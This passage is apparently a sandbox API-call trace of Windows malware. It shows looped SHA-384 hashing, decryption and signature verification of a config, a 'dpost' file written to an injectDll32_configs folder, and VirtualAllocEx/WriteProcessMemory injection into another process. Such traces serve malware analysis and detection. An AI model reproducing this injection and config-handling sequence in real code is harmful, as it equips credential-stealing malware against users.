	[0193.949] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.949] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0193.949] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.949] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230abd0
	[0193.949] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230abd0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230abd0, pdwDataLen=0x1283b0) returned 1
	[0193.949] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.949] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.949] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.949] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.949] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0193.949] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.949] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230abf8
	[0193.949] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230abf8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230abf8, pdwDataLen=0x1283b0) returned 1
	[0193.949] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.950] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.950] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.950] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.950] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0193.950] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.950] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ac20
	[0193.950] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230ac20, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230ac20, pdwDataLen=0x1283b0) returned 1
	[0193.950] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.950] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.950] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.950] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.950] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0193.950] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.950] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ac48
	[0193.950] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230ac48, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230ac48, pdwDataLen=0x1283b0) returned 1
	[0193.951] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.951] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.951] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.951] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.951] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0193.951] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.951] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ac70
	[0193.951] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230ac70, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230ac70, pdwDataLen=0x1283b0) returned 1
	[0193.951] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.951] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.951] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.951] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.951] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0193.951] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.951] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ac98
	[0193.952] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230ac98, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230ac98, pdwDataLen=0x1283b0) returned 1
	[0193.952] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.952] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.952] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.952] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.952] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0193.952] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.952] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230acc0
	[0193.952] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230acc0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230acc0, pdwDataLen=0x1283b0) returned 1
	[0193.952] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.952] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.952] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.952] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.952] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0193.952] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.952] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ace8
	[0193.953] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230ace8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230ace8, pdwDataLen=0x1283b0) returned 1
	[0193.953] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.953] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.953] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.953] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.953] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0193.953] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.953] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ad10
	[0193.953] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230ad10, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230ad10, pdwDataLen=0x1283b0) returned 1
	[0193.953] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.953] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.953] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.953] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.953] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0193.954] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.954] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ad38
	[0193.954] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230ad38, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230ad38, pdwDataLen=0x1283b0) returned 1
	[0193.954] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.954] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.954] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.954] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.954] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0193.954] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.954] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ad60
	[0193.954] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230ad60, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230ad60, pdwDataLen=0x1283b0) returned 1
	[0193.954] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.954] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.954] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.954] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.954] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0193.955] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.955] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ad88
	[0193.955] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230ad88, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230ad88, pdwDataLen=0x1283b0) returned 1
	[0193.955] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.955] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.955] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.955] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.955] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0193.955] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.955] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230adb0
	[0193.955] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230adb0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230adb0, pdwDataLen=0x1283b0) returned 1
	[0193.955] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.955] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0194.002] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0194.003] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0194.003] CryptHashData (hHash=0x22b6600, pbData=0x2753bd8, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0194.003] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0194.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2634d8
	[0194.003] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2634d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2634d8, pdwDataLen=0x1283b0) returned 1
	[0194.003] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0194.003] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0194.003] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0194.003] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0194.003] CryptHashData (hHash=0x22b68c0, pbData=0x2753bd8, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0194.003] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0194.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263488
	[0194.003] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x263488, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263488, pdwDataLen=0x1283b0) returned 1
	[0194.003] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0194.003] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0194.003] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0194.004] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0194.004] CryptHashData (hHash=0x22b6600, pbData=0x2753bd8, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0194.004] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0194.004] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2634b0
	[0194.004] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2634b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2634b0, pdwDataLen=0x1283b0) returned 1
	[0194.004] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0194.004] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0194.004] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0194.004] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0194.004] CryptHashData (hHash=0x22b68c0, pbData=0x2753bd8, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0194.004] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0194.004] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263500
	[0194.004] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x263500, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263500, pdwDataLen=0x1283b0) returned 1
	[0194.004] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0194.004] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0194.004] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0194.005] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0194.005] CryptHashData (hHash=0x22b6600, pbData=0x2753bd8, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0194.005] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0194.005] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x263438, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263438, pdwDataLen=0x1283b0) returned 1
	[0194.005] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0194.005] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0194.005] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0194.005] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0194.005] CryptHashData (hHash=0x22b68c0, pbData=0x2753bd8, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0194.005] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0194.005] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x263460, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263460, pdwDataLen=0x1283b0) returned 1
	[0194.005] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0194.005] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0194.005] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0194.006] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0194.006] CryptHashData (hHash=0x22b6600, pbData=0x2753bd8, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0194.006] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0194.006] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x230add8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230add8, pdwDataLen=0x1283b0) returned 1
	[0194.006] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0194.006] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0194.007] CryptImportKey (in: hProv=0x225390, pbData=0x1283a4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x1283e4 | out: phKey=0x1283e4*=0x22b6600) returned 1
	[0194.007] CryptSetKeyParam (hKey=0x22b6600, dwParam=0x4, pbData=0x1283d0*=0x1, dwFlags=0x0) returned 1
	[0194.007] CryptSetKeyParam (hKey=0x22b6600, dwParam=0x1, pbData=0x230aef0, dwFlags=0x0) returned 1
	[0194.007] CryptDecrypt (in: hKey=0x22b6600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22ca628, pdwDataLen=0x1283d8 | out: pbData=0x22ca628, pdwDataLen=0x1283d8) returned 1
	[0194.007] CryptDestroyKey (hKey=0x22b6600) returned 1
	[0194.007] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0194.007] GetVersion () returned 0x1db10106
	[0194.007] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x1283e4, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x1283e4) returned 0x0
	[0194.007] BCryptImportKeyPair (in: hAlgorithm=0x22ee2a8, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x1283ec, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x1283ec) returned 0x0
	[0194.010] BCryptGetProperty (in: hObject=0x212670, pszProperty="SignatureLength", pbOutput=0x128404, cbOutput=0x4, pcbResult=0x1283dc, dwFlags=0x0 | out: pbOutput=0x128404, pcbResult=0x1283dc) returned 0x0
	[0194.010] BCryptVerifySignature (hKey=0x212670, pPaddingInfo=0x0, pbHash=0x22a6298, cbHash=0x30, pbSignature=0x22ca91b, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0194.012] BCryptDestroyKey (in: hKey=0x212670 | out: hKey=0x212670) returned 0x0
	[0194.012] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee2a8, dwFlags=0x0 | out: hAlgorithm=0x22ee2a8) returned 0x0
	[0194.012] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6298) returned 1
	[0194.012] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x2f0) returned 0x22ca9a0
	[0194.012] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2309be0) returned 1
	[0194.012] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x230aef0) returned 1
	[0194.012] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ca628) returned 1
	[0194.012] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs")) returned 0x2010
	[0194.012] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498
	[0194.016] WriteFile (in: hFile=0x498, lpBuffer=0x26ce2e8*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x128444, lpOverlapped=0x0 | out: lpBuffer=0x26ce2e8*, lpNumberOfBytesWritten=0x128444*=0x3a0, lpOverlapped=0x0) returned 1
	[0194.017] CloseHandle (hObject=0x498) returned 1
	[0194.018] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128454 | out: lpSystemTimeAsFileTime=0x128454*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) 
	[0194.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dpost", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
	[0194.018] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff2e8
	[0194.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dpost", cchWideChar=-1, lpMultiByteStr=0x22ff2e8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dpost", lpUsedDefaultChar=0x0) returned 6
	[0194.018] lstrlenA (lpString="dpost") returned 5
	[0194.018] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0194.019] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ff2e8*, nSize=0x6, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x22ff2e8*, lpNumberOfBytesWritten=0x127f34*=0x6) returned 1
	[0194.020] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x2eb, flAllocationType=0x3000, flProtect=0x40) returned 0x230000
	[0194.020] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x230000, lpBuffer=0x22ca9a0*, nSize=0x2eb, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x22ca9a0*, lpNumberOfBytesWritten=0x127f34*=0x2eb) returned 1
	[0194.020] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x240000
	[0194.021] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x240000, lpBuffer=0x127fc0*, nSize=0x400, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x127fc0*, lpNumberOfBytesWritten=0x127f34*=0x400) returned 1
	[0194.021] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x40) returned 0x5c0000
	[0194.021] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5c0000, lpBuffer=0x1283c0*, nSize=0x80, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x1283c0*, lpNumberOfBytesWritten=0x127f34*=0x80) returned 1
	[0194.022] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x5d0000
